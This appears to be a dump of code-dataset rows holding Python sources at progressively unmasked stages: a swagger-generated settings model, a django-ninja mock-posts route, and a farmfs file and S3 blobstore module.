raw_data_setting\n if units_setting is not None:\n self.units_setting = units_setting\n if work_hours_setting is not None:\n self.work_hours_setting = work_hours_setting\n\n @property\n def data_aggregation_setting(self):\n \"\"\"Gets the data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: DataAggregationSetting\n \"\"\"\n return self._data_aggregation_setting\n\n @data_aggregation_setting.setter\n def data_aggregation_setting(self, data_aggregation_setting):\n \"\"\"Sets the data_aggregation_setting of this RawDataSettingsV1.\n\n\n :param data_aggregation_setting: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n :type: DataAggregationSetting\n \"\"\"\n\n self._data_aggregation_setting = data_aggregation_setting\n\n @property\n def raw_data_setting(self):\n \"\"\"Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: RawDataSettingV1\n \"\"\"\n return self._raw_data_setting\n\n @raw_data_setting.setter\n def raw_data_setting(self, raw_data_setting):\n \"\"\"Sets the raw_data_setting of this RawDataSettingsV1.\n\n\n :param raw_data_setting: The raw_data_setting of this RawDataSettingsV1. # noqa: E501\n :type: RawDataSettingV1\n \"\"\"\n\n self._raw_data_setting = raw_data_setting\n\n @property\n def units_setting(self):\n \"\"\"Gets the units_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The units_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: UnitsSetting\n \"\"\"\n return self._units_setting\n\n @units_setting.setter\n def units_setting(self, units_setting):\n \"\"\"Sets the units_setting of this RawDataSettingsV1.\n\n\n :param units_setting: The units_setting of this RawDataSettingsV1. 
# noqa: E501\n :type: UnitsSetting\n \"\"\"\n\n self._units_setting = units_setting\n\n @property\n def work_hours_setting(self):\n \"\"\"Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The work_hours_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: WorkHoursSetting\n \"\"\"\n return self._work_hours_setting\n\n @work_hours_setting.setter\n def work_hours_setting(self, work_hours_setting):\n \"\"\"Sets the work_hours_setting of this RawDataSettingsV1.\n\n\n :param work_hours_setting: The work_hours_setting of this RawDataSettingsV1. # noqa: E501\n :type: WorkHoursSetting\n \"\"\"\n\n self._work_hours_setting = work_hours_setting\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(RawDataSettingsV1, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, RawDataSettingsV1):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n",
"step-ids": [
8,
15,
17,
18,
19
]
}
|
[
8,
15,
17,
18,
19
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@mock_post_router.get('/mock_posts', url_name='mock_post_list', summary=
'전체 mock post의 list를 반환한다', response={(200): None})
def retrieve_all_mock_posts(request):
return HTTPStatus.OK
<|reserved_special_token_1|>
<|reserved_special_token_0|>
mock_post_router = Router()
@mock_post_router.get('/mock_posts', url_name='mock_post_list', summary=
'전체 mock post의 list를 반환한다', response={(200): None})
def retrieve_all_mock_posts(request):
return HTTPStatus.OK
<|reserved_special_token_1|>
from http import HTTPStatus
from ninja import Router
mock_post_router = Router()
@mock_post_router.get('/mock_posts', url_name='mock_post_list', summary=
'전체 mock post의 list를 반환한다', response={(200): None})
def retrieve_all_mock_posts(request):
return HTTPStatus.OK
<|reserved_special_token_1|>
from http import HTTPStatus
from ninja import Router
mock_post_router = Router()
@mock_post_router.get(
"/mock_posts",
url_name="mock_post_list",
summary="전체 mock post의 list를 반환한다",
response={200: None},
)
def retrieve_all_mock_posts(request):
return HTTPStatus.OK
|
flexible
|
{
"blob_id": "dcb57ecf2c72b8ac816bb06986d80544ff97c669",
"index": 5915,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@mock_post_router.get('/mock_posts', url_name='mock_post_list', summary=\n '전체 mock post의 list를 반환한다', response={(200): None})\ndef retrieve_all_mock_posts(request):\n return HTTPStatus.OK\n",
"step-3": "<mask token>\nmock_post_router = Router()\n\n\n@mock_post_router.get('/mock_posts', url_name='mock_post_list', summary=\n '전체 mock post의 list를 반환한다', response={(200): None})\ndef retrieve_all_mock_posts(request):\n return HTTPStatus.OK\n",
"step-4": "from http import HTTPStatus\nfrom ninja import Router\nmock_post_router = Router()\n\n\n@mock_post_router.get('/mock_posts', url_name='mock_post_list', summary=\n '전체 mock post의 list를 반환한다', response={(200): None})\ndef retrieve_all_mock_posts(request):\n return HTTPStatus.OK\n",
"step-5": "from http import HTTPStatus\n\nfrom ninja import Router\n\nmock_post_router = Router()\n\n\n@mock_post_router.get(\n \"/mock_posts\",\n url_name=\"mock_post_list\",\n summary=\"전체 mock post의 list를 반환한다\",\n response={200: None},\n)\ndef retrieve_all_mock_posts(request):\n return HTTPStatus.OK\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from farmfs.fs import Path, ensure_link, ensure_readonly, ensure_symlink, ensure_copy, ftype_selector, FILE, is_readonly
from func_prototypes import typed, returned
from farmfs.util import safetype, pipeline, fmap, first, compose, invert, partial, repeater
from os.path import sep
from s3lib import Connection as s3conn, LIST_BUCKET_KEY
import re
_sep_replace_ = re.compile(sep)
@returned(safetype)
@typed(safetype)
def _remove_sep_(path):
    """Strip every path-separator character out of *path* and return the result."""
    stripped, _count = _sep_replace_.subn("", path)
    return stripped
#TODO we should remove references to vol.bs.reverser, as thats leaking format information into the volume.
def reverser(num_segs=3):
    """Returns a function which takes Paths into the user data and returns csums.

    The returned callable expects a path whose trailing ``num_segs + 1``
    components are hex segments (the layout produced by _checksum_to_path).
    """
    # Raw string: the previous pattern embedded "\/" in a plain string,
    # which is an invalid escape sequence (SyntaxWarning on modern Python,
    # slated to become an error). "/" needs no escaping in a regex, and
    # [0-9a-f] is equivalent to the old ([0-9]|[a-f]) alternation.
    r = re.compile(r"((/[0-9a-f]+){%d})$" % (num_segs + 1))
    def checksum_from_link(link):
        """Takes a path into the userdata, returns the matching csum."""
        m = r.search(safetype(link))
        if m:
            csum_slash = m.group()[1:]
            csum = _remove_sep_(csum_slash)
            return csum
        else:
            raise ValueError("link %s checksum didn't parse" %(link))
    return checksum_from_link
@returned(safetype)
@typed(safetype, int, int)
def _checksum_to_path(checksum, num_segs=3, seg_len=3):
    """Split *checksum* into up to ``num_segs`` leading segments of
    ``seg_len`` characters each, joined by the path separator, with the
    remainder of the checksum as the final segment."""
    prefix_len = min(len(checksum), seg_len * num_segs)
    segs = [checksum[start:start + seg_len]
            for start in range(0, prefix_len, seg_len)]
    segs.append(checksum[num_segs * seg_len:])
    return sep.join(segs)
class Blobstore:
    """Abstract marker for blob stores; only concrete subclasses are usable."""
    def __init__(self):
        # This base class is deliberately not instantiable.
        raise NotImplementedError()
class FileBlobstore:
    """Blobstore backed by a directory tree of read-only files named by csum."""

    def __init__(self, root, num_segs=3):
        # root: Path under which all blobs live.
        # num_segs: directory fan-out depth used when mapping csums to paths.
        self.root = root
        self.reverser = reverser(num_segs)

    def _csum_to_name(self, csum):
        """Return string name of link relative to root"""
        #TODO someday when csums are parameterized, we inject the has params here.
        return _checksum_to_path(csum)

    def csum_to_path(self, csum):
        """Return absolute Path to a blob given a csum"""
        #TODO remove callers so we can make internal.
        return Path(self._csum_to_name(csum), self.root)

    def exists(self, csum):
        """Return True when a blob with this csum is present in the store."""
        blob = self.csum_to_path(csum)
        return blob.exists()

    def delete_blob(self, csum):
        """Takes a csum, and removes it from the blobstore"""
        blob_path = self.csum_to_path(csum)
        blob_path.unlink(clean=self.root)

    def import_via_link(self, path, csum):
        """Adds a file to a blobstore via a hard link.

        Returns True when the blob was already present (duplicate),
        False when it was newly linked in and made read-only.
        """
        blob = self.csum_to_path(csum)
        duplicate = blob.exists()
        if not duplicate:
            ensure_link(blob, path)
            ensure_readonly(blob)
        return duplicate

    def fetch_blob(self, remote, csum):
        """Copy the blob for csum from another file blobstore into this one.

        Returns True when the blob was already present locally (consistent
        with import_via_link's return convention), False when it was copied.
        """
        src_blob = remote.csum_to_path(csum)
        dst_blob = self.csum_to_path(csum)
        duplicate = dst_blob.exists()
        if not duplicate:
            ensure_copy(dst_blob, src_blob)
        return duplicate

    def link_to_blob(self, path, csum):
        """Forces path into a symlink to csum"""
        new_link = self.csum_to_path(csum)
        ensure_symlink(path, new_link)
        ensure_readonly(path)

    def blobs(self):
        """Iterator across all blobs"""
        # Walk the root, keep regular files, and map each path back to its csum.
        blobs = pipeline(
            ftype_selector([FILE]),
            fmap(first),
            fmap(self.reverser),
        )(self.root.entries())
        return blobs

    def read_handle(self):
        """Returns a file like object which has the blob's contents"""
        raise NotImplementedError()

    def verify_blob_checksum(self, blob):
        """Recompute the named blob's checksum from its contents.

        Returns True when the recomputed checksum does NOT match *blob*
        (i.e. the blob is corrupt) and False when it verifies clean.
        NOTE(review): the previous docstring claimed the opposite polarity;
        the code returns truthy on corruption and the name is misleading --
        confirm callers expect "is corrupt" semantics before renaming.
        """
        path = self.csum_to_path(blob)
        csum = path.checksum()
        return csum != blob

    def verify_blob_permissions(self, blob):
        """Returns True when the blob's permissions is read only. Returns False when the blob is mutable."""
        path = self.csum_to_path(blob)
        return is_readonly(path)
class S3Blobstore:
    """Blobstore backed by an S3 bucket; blob keys live under ``prefix``."""

    def __init__(self, bucket, prefix, access_id, secret):
        self.bucket = bucket
        self.prefix = prefix
        self.access_id = access_id
        self.secret = secret

    def blobs(self):
        """Iterator across all blobs"""
        strip = len(self.prefix) + 1

        def blob_iterator():
            with s3conn(self.access_id, self.secret) as s3:
                for key in s3.list_bucket(self.bucket, prefix=self.prefix + "/"):
                    # Drop "<prefix>/" from the key to recover the csum.
                    yield key[strip:]
        return blob_iterator

    def blob_stats(self):
        """Iterator across all blobs, retaining the listing information"""
        strip = len(self.prefix) + 1

        def blob_iterator():
            with s3conn(self.access_id, self.secret) as s3:
                for head in s3.list_bucket2(self.bucket, prefix=self.prefix + "/"):
                    head['blob'] = head[LIST_BUCKET_KEY][strip:]
                    yield head
        return blob_iterator

    def read_handle(self):
        """Returns a file like object which has the blob's contents"""
        raise NotImplementedError()

    def upload(self, csum, path):
        """Build a retrying callable that PUTs *path*'s bytes to csum's key."""
        key = self.prefix + "/" + csum

        def uploader():
            with path.open('rb') as f:
                with s3conn(self.access_id, self.secret) as s3:
                    #TODO should provide pre-calculated md5 rather than recompute.
                    return s3.put_object(self.bucket, key, f)

        def http_success(status_headers):
            status = status_headers[0]
            return 200 <= status < 300

        def s3_exception(e):
            return isinstance(e, ValueError)

        return repeater(uploader, max_tries=3,
                        predicate=http_success, catch_predicate=s3_exception)
|
normal
|
{
"blob_id": "4fb1ece28cd7c6e2ac3a479dcbf81ee09ba14223",
"index": 3096,
"step-1": "<mask token>\n\n\nclass FileBlobstore:\n <mask token>\n\n def _csum_to_name(self, csum):\n \"\"\"Return string name of link relative to root\"\"\"\n return _checksum_to_path(csum)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass S3Blobstore:\n\n def __init__(self, bucket, prefix, access_id, secret):\n self.bucket = bucket\n self.prefix = prefix\n self.access_id = access_id\n self.secret = secret\n\n def blobs(self):\n \"\"\"Iterator across all blobs\"\"\"\n\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket(self.bucket, prefix=self.prefix + '/'\n )\n for key in key_iter:\n blob = key[len(self.prefix) + 1:]\n yield blob\n return blob_iterator\n\n def blob_stats(self):\n \"\"\"Iterator across all blobs, retaining the listing information\"\"\"\n\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket2(self.bucket, prefix=self.prefix +\n '/')\n for head in key_iter:\n blob = head[LIST_BUCKET_KEY][len(self.prefix) + 1:]\n head['blob'] = blob\n yield head\n return blob_iterator\n\n def read_handle(self):\n \"\"\"Returns a file like object which has the blob's contents\"\"\"\n raise NotImplementedError()\n\n def upload(self, csum, path):\n key = self.prefix + '/' + csum\n\n def uploader():\n with path.open('rb') as f:\n with s3conn(self.access_id, self.secret) as s3:\n result = s3.put_object(self.bucket, key, f)\n return result\n http_success = lambda status_headers: status_headers[0\n ] >= 200 and status_headers[0] < 300\n s3_exception = lambda e: isinstance(e, ValueError)\n upload_repeater = repeater(uploader, max_tries=3, predicate=\n http_success, catch_predicate=s3_exception)\n return upload_repeater\n",
"step-2": "<mask token>\n\n\nclass FileBlobstore:\n <mask token>\n\n def _csum_to_name(self, csum):\n \"\"\"Return string name of link relative to root\"\"\"\n return _checksum_to_path(csum)\n <mask token>\n\n def exists(self, csum):\n blob = self.csum_to_path(csum)\n return blob.exists()\n\n def delete_blob(self, csum):\n \"\"\"Takes a csum, and removes it from the blobstore\"\"\"\n blob_path = self.csum_to_path(csum)\n blob_path.unlink(clean=self.root)\n <mask token>\n\n def fetch_blob(self, remote, csum):\n src_blob = remote.csum_to_path(csum)\n dst_blob = self.csum_to_path(csum)\n duplicate = dst_blob.exists()\n if not duplicate:\n ensure_copy(dst_blob, src_blob)\n <mask token>\n <mask token>\n <mask token>\n\n def verify_blob_checksum(self, blob):\n \"\"\"Returns True when the blob's checksum matches. Returns False when there is a checksum corruption.\"\"\"\n path = self.csum_to_path(blob)\n csum = path.checksum()\n return csum != blob\n <mask token>\n\n\nclass S3Blobstore:\n\n def __init__(self, bucket, prefix, access_id, secret):\n self.bucket = bucket\n self.prefix = prefix\n self.access_id = access_id\n self.secret = secret\n\n def blobs(self):\n \"\"\"Iterator across all blobs\"\"\"\n\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket(self.bucket, prefix=self.prefix + '/'\n )\n for key in key_iter:\n blob = key[len(self.prefix) + 1:]\n yield blob\n return blob_iterator\n\n def blob_stats(self):\n \"\"\"Iterator across all blobs, retaining the listing information\"\"\"\n\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket2(self.bucket, prefix=self.prefix +\n '/')\n for head in key_iter:\n blob = head[LIST_BUCKET_KEY][len(self.prefix) + 1:]\n head['blob'] = blob\n yield head\n return blob_iterator\n\n def read_handle(self):\n \"\"\"Returns a file like object which has the blob's contents\"\"\"\n raise NotImplementedError()\n\n def upload(self, csum, path):\n 
key = self.prefix + '/' + csum\n\n def uploader():\n with path.open('rb') as f:\n with s3conn(self.access_id, self.secret) as s3:\n result = s3.put_object(self.bucket, key, f)\n return result\n http_success = lambda status_headers: status_headers[0\n ] >= 200 and status_headers[0] < 300\n s3_exception = lambda e: isinstance(e, ValueError)\n upload_repeater = repeater(uploader, max_tries=3, predicate=\n http_success, catch_predicate=s3_exception)\n return upload_repeater\n",
"step-3": "<mask token>\n\n\nclass FileBlobstore:\n\n def __init__(self, root, num_segs=3):\n self.root = root\n self.reverser = reverser(num_segs)\n\n def _csum_to_name(self, csum):\n \"\"\"Return string name of link relative to root\"\"\"\n return _checksum_to_path(csum)\n\n def csum_to_path(self, csum):\n \"\"\"Return absolute Path to a blob given a csum\"\"\"\n return Path(self._csum_to_name(csum), self.root)\n\n def exists(self, csum):\n blob = self.csum_to_path(csum)\n return blob.exists()\n\n def delete_blob(self, csum):\n \"\"\"Takes a csum, and removes it from the blobstore\"\"\"\n blob_path = self.csum_to_path(csum)\n blob_path.unlink(clean=self.root)\n <mask token>\n\n def fetch_blob(self, remote, csum):\n src_blob = remote.csum_to_path(csum)\n dst_blob = self.csum_to_path(csum)\n duplicate = dst_blob.exists()\n if not duplicate:\n ensure_copy(dst_blob, src_blob)\n\n def link_to_blob(self, path, csum):\n \"\"\"Forces path into a symlink to csum\"\"\"\n new_link = self.csum_to_path(csum)\n ensure_symlink(path, new_link)\n ensure_readonly(path)\n\n def blobs(self):\n \"\"\"Iterator across all blobs\"\"\"\n blobs = pipeline(ftype_selector([FILE]), fmap(first), fmap(self.\n reverser))(self.root.entries())\n return blobs\n <mask token>\n\n def verify_blob_checksum(self, blob):\n \"\"\"Returns True when the blob's checksum matches. 
Returns False when there is a checksum corruption.\"\"\"\n path = self.csum_to_path(blob)\n csum = path.checksum()\n return csum != blob\n <mask token>\n\n\nclass S3Blobstore:\n\n def __init__(self, bucket, prefix, access_id, secret):\n self.bucket = bucket\n self.prefix = prefix\n self.access_id = access_id\n self.secret = secret\n\n def blobs(self):\n \"\"\"Iterator across all blobs\"\"\"\n\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket(self.bucket, prefix=self.prefix + '/'\n )\n for key in key_iter:\n blob = key[len(self.prefix) + 1:]\n yield blob\n return blob_iterator\n\n def blob_stats(self):\n \"\"\"Iterator across all blobs, retaining the listing information\"\"\"\n\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket2(self.bucket, prefix=self.prefix +\n '/')\n for head in key_iter:\n blob = head[LIST_BUCKET_KEY][len(self.prefix) + 1:]\n head['blob'] = blob\n yield head\n return blob_iterator\n\n def read_handle(self):\n \"\"\"Returns a file like object which has the blob's contents\"\"\"\n raise NotImplementedError()\n\n def upload(self, csum, path):\n key = self.prefix + '/' + csum\n\n def uploader():\n with path.open('rb') as f:\n with s3conn(self.access_id, self.secret) as s3:\n result = s3.put_object(self.bucket, key, f)\n return result\n http_success = lambda status_headers: status_headers[0\n ] >= 200 and status_headers[0] < 300\n s3_exception = lambda e: isinstance(e, ValueError)\n upload_repeater = repeater(uploader, max_tries=3, predicate=\n http_success, catch_predicate=s3_exception)\n return upload_repeater\n",
"step-4": "<mask token>\n\n\nclass Blobstore:\n <mask token>\n\n\nclass FileBlobstore:\n\n def __init__(self, root, num_segs=3):\n self.root = root\n self.reverser = reverser(num_segs)\n\n def _csum_to_name(self, csum):\n \"\"\"Return string name of link relative to root\"\"\"\n return _checksum_to_path(csum)\n\n def csum_to_path(self, csum):\n \"\"\"Return absolute Path to a blob given a csum\"\"\"\n return Path(self._csum_to_name(csum), self.root)\n\n def exists(self, csum):\n blob = self.csum_to_path(csum)\n return blob.exists()\n\n def delete_blob(self, csum):\n \"\"\"Takes a csum, and removes it from the blobstore\"\"\"\n blob_path = self.csum_to_path(csum)\n blob_path.unlink(clean=self.root)\n\n def import_via_link(self, path, csum):\n \"\"\"Adds a file to a blobstore via a hard link.\"\"\"\n blob = self.csum_to_path(csum)\n duplicate = blob.exists()\n if not duplicate:\n ensure_link(blob, path)\n ensure_readonly(blob)\n return duplicate\n\n def fetch_blob(self, remote, csum):\n src_blob = remote.csum_to_path(csum)\n dst_blob = self.csum_to_path(csum)\n duplicate = dst_blob.exists()\n if not duplicate:\n ensure_copy(dst_blob, src_blob)\n\n def link_to_blob(self, path, csum):\n \"\"\"Forces path into a symlink to csum\"\"\"\n new_link = self.csum_to_path(csum)\n ensure_symlink(path, new_link)\n ensure_readonly(path)\n\n def blobs(self):\n \"\"\"Iterator across all blobs\"\"\"\n blobs = pipeline(ftype_selector([FILE]), fmap(first), fmap(self.\n reverser))(self.root.entries())\n return blobs\n\n def read_handle(self):\n \"\"\"Returns a file like object which has the blob's contents\"\"\"\n raise NotImplementedError()\n\n def verify_blob_checksum(self, blob):\n \"\"\"Returns True when the blob's checksum matches. Returns False when there is a checksum corruption.\"\"\"\n path = self.csum_to_path(blob)\n csum = path.checksum()\n return csum != blob\n\n def verify_blob_permissions(self, blob):\n \"\"\"Returns True when the blob's permissions is read only. 
Returns False when the blob is mutable.\"\"\"\n path = self.csum_to_path(blob)\n return is_readonly(path)\n\n\nclass S3Blobstore:\n\n def __init__(self, bucket, prefix, access_id, secret):\n self.bucket = bucket\n self.prefix = prefix\n self.access_id = access_id\n self.secret = secret\n\n def blobs(self):\n \"\"\"Iterator across all blobs\"\"\"\n\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket(self.bucket, prefix=self.prefix + '/'\n )\n for key in key_iter:\n blob = key[len(self.prefix) + 1:]\n yield blob\n return blob_iterator\n\n def blob_stats(self):\n \"\"\"Iterator across all blobs, retaining the listing information\"\"\"\n\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket2(self.bucket, prefix=self.prefix +\n '/')\n for head in key_iter:\n blob = head[LIST_BUCKET_KEY][len(self.prefix) + 1:]\n head['blob'] = blob\n yield head\n return blob_iterator\n\n def read_handle(self):\n \"\"\"Returns a file like object which has the blob's contents\"\"\"\n raise NotImplementedError()\n\n def upload(self, csum, path):\n key = self.prefix + '/' + csum\n\n def uploader():\n with path.open('rb') as f:\n with s3conn(self.access_id, self.secret) as s3:\n result = s3.put_object(self.bucket, key, f)\n return result\n http_success = lambda status_headers: status_headers[0\n ] >= 200 and status_headers[0] < 300\n s3_exception = lambda e: isinstance(e, ValueError)\n upload_repeater = repeater(uploader, max_tries=3, predicate=\n http_success, catch_predicate=s3_exception)\n return upload_repeater\n",
"step-5": "from farmfs.fs import Path, ensure_link, ensure_readonly, ensure_symlink, ensure_copy, ftype_selector, FILE, is_readonly\nfrom func_prototypes import typed, returned\nfrom farmfs.util import safetype, pipeline, fmap, first, compose, invert, partial, repeater\nfrom os.path import sep\nfrom s3lib import Connection as s3conn, LIST_BUCKET_KEY\nimport re\n\n_sep_replace_ = re.compile(sep)\n@returned(safetype)\n@typed(safetype)\ndef _remove_sep_(path):\n return _sep_replace_.subn(\"\",path)[0]\n\n#TODO we should remove references to vol.bs.reverser, as thats leaking format information into the volume.\ndef reverser(num_segs=3):\n \"\"\"Returns a function which takes Paths into the user data and returns csums.\"\"\"\n r = re.compile(\"((\\/([0-9]|[a-f])+){%d})$\" % (num_segs+1))\n def checksum_from_link(link):\n \"\"\"Takes a path into the userdata, returns the matching csum.\"\"\"\n m = r.search(safetype(link))\n if (m):\n csum_slash = m.group()[1:]\n csum = _remove_sep_(csum_slash)\n return csum\n else:\n raise ValueError(\"link %s checksum didn't parse\" %(link))\n return checksum_from_link\n\n@returned(safetype)\n@typed(safetype, int, int)\ndef _checksum_to_path(checksum, num_segs=3, seg_len=3):\n segs = [ checksum[i:i+seg_len] for i in range(0, min(len(checksum), seg_len * num_segs), seg_len)]\n segs.append(checksum[num_segs*seg_len:])\n return sep.join(segs)\n\nclass Blobstore:\n def __init__(self):\n raise NotImplementedError()\n\nclass FileBlobstore:\n def __init__(self, root, num_segs=3):\n self.root = root\n self.reverser = reverser(num_segs)\n\n def _csum_to_name(self, csum):\n \"\"\"Return string name of link relative to root\"\"\"\n #TODO someday when csums are parameterized, we inject the has params here.\n return _checksum_to_path(csum)\n\n def csum_to_path(self, csum):\n \"\"\"Return absolute Path to a blob given a csum\"\"\"\n #TODO remove callers so we can make internal.\n return Path(self._csum_to_name(csum), self.root)\n\n def exists(self, 
csum):\n blob = self.csum_to_path(csum)\n return blob.exists()\n\n def delete_blob(self, csum):\n \"\"\"Takes a csum, and removes it from the blobstore\"\"\"\n blob_path = self.csum_to_path(csum)\n blob_path.unlink(clean=self.root)\n\n def import_via_link(self, path, csum):\n \"\"\"Adds a file to a blobstore via a hard link.\"\"\"\n blob = self.csum_to_path(csum)\n duplicate = blob.exists()\n if not duplicate:\n ensure_link(blob, path)\n ensure_readonly(blob)\n return duplicate\n\n def fetch_blob(self, remote, csum):\n src_blob = remote.csum_to_path(csum)\n dst_blob = self.csum_to_path(csum)\n duplicate = dst_blob.exists()\n if not duplicate:\n ensure_copy(dst_blob, src_blob)\n\n def link_to_blob(self, path, csum):\n \"\"\"Forces path into a symlink to csum\"\"\"\n new_link = self.csum_to_path(csum)\n ensure_symlink(path, new_link)\n ensure_readonly(path)\n\n def blobs(self):\n \"\"\"Iterator across all blobs\"\"\"\n blobs = pipeline(\n ftype_selector([FILE]),\n fmap(first),\n fmap(self.reverser),\n )(self.root.entries())\n return blobs\n\n def read_handle(self):\n \"\"\"Returns a file like object which has the blob's contents\"\"\"\n raise NotImplementedError()\n\n def verify_blob_checksum(self, blob):\n \"\"\"Returns True when the blob's checksum matches. Returns False when there is a checksum corruption.\"\"\"\n path = self.csum_to_path(blob)\n csum = path.checksum()\n return csum != blob\n\n def verify_blob_permissions(self, blob):\n \"\"\"Returns True when the blob's permissions is read only. 
Returns False when the blob is mutable.\"\"\"\n path = self.csum_to_path(blob)\n return is_readonly(path)\n\n\nclass S3Blobstore:\n def __init__(self, bucket, prefix, access_id, secret):\n self.bucket = bucket\n self.prefix = prefix\n self.access_id = access_id\n self.secret = secret\n\n def blobs(self):\n \"\"\"Iterator across all blobs\"\"\"\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket(self.bucket, prefix=self.prefix+\"/\")\n for key in key_iter:\n blob = key[len(self.prefix)+1:]\n yield blob\n return blob_iterator\n\n def blob_stats(self):\n \"\"\"Iterator across all blobs, retaining the listing information\"\"\"\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket2(self.bucket, prefix=self.prefix+\"/\")\n for head in key_iter:\n blob = head[LIST_BUCKET_KEY][len(self.prefix)+1:]\n head['blob'] = blob\n yield head\n return blob_iterator\n\n def read_handle(self):\n \"\"\"Returns a file like object which has the blob's contents\"\"\"\n raise NotImplementedError()\n\n def upload(self, csum, path):\n key = self.prefix + \"/\" + csum\n def uploader():\n with path.open('rb') as f:\n with s3conn(self.access_id, self.secret) as s3:\n #TODO should provide pre-calculated md5 rather than recompute.\n result = s3.put_object(self.bucket, key, f)\n return result\n http_success = lambda status_headers: status_headers[0] >=200 and status_headers[0] < 300\n s3_exception = lambda e: isinstance(e, ValueError)\n upload_repeater = repeater(uploader, max_tries = 3, predicate = http_success, catch_predicate = s3_exception)\n return upload_repeater\n",
"step-ids": [
8,
12,
16,
20,
27
]
}
|
[
8,
12,
16,
20,
27
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.